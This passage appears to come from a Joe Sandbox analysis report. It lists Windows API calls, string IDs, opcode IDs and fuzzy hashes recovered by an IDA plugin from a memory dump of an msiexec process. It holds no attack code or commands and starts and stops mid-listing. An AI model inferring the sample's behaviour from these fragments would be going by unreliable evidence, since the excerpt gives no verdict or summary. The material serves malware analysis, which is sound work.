                                                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                APIs
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                • String ID:
                                                                                • API String ID: 822687973-0
                                                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                • malloc.MSVCRT ref: 00417459
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                • free.MSVCRT ref: 0041747F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                • String ID:
                                                                                • API String ID: 2605342592-0
                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 2678498856-0
                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Item
                                                                                • String ID:
                                                                                • API String ID: 3888421826-0
                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                • String ID:
                                                                                • API String ID: 3727323765-0
                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F673
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                • strlen.MSVCRT ref: 00403006
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$CloseHandle
                                                                                • String ID: General
                                                                                • API String ID: 3722638380-26480598
                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                APIs
                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                • String ID:
                                                                                • API String ID: 764393265-0
                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                • String ID:
                                                                                • API String ID: 979780441-0
                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                APIs
                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                • String ID:
                                                                                • API String ID: 1386444988-0
                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateMessageRectSend
                                                                                • String ID: d=E
                                                                                • API String ID: 909852535-3703654223
                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcschr$memcpywcslen
                                                                                • String ID: "
                                                                                • API String ID: 1983396471-123907689
                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                APIs
                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                • String ID: URL
                                                                                • API String ID: 2108176848-3574463123
                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                APIs
                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfmemcpy
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2789212964-323797159
                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf
                                                                                • String ID: %%-%d.%ds
                                                                                • API String ID: 3988819677-2008345750
                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E770
                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendmemset
                                                                                • String ID: F^@
                                                                                • API String ID: 568519121-3652327722
                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PlacementWindowmemset
                                                                                • String ID: WinPos
                                                                                • API String ID: 4036792311-2823255486
                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@DeleteObject
                                                                                • String ID: r!A
                                                                                • API String ID: 1103273653-628097481
                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                APIs
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                • String ID: _lng.ini
                                                                                • API String ID: 383090722-1948609170
                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                • API String ID: 2773794195-880857682
                                                                                • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                • memset.MSVCRT ref: 0042BAAE
                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                APIs
                                                                                  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
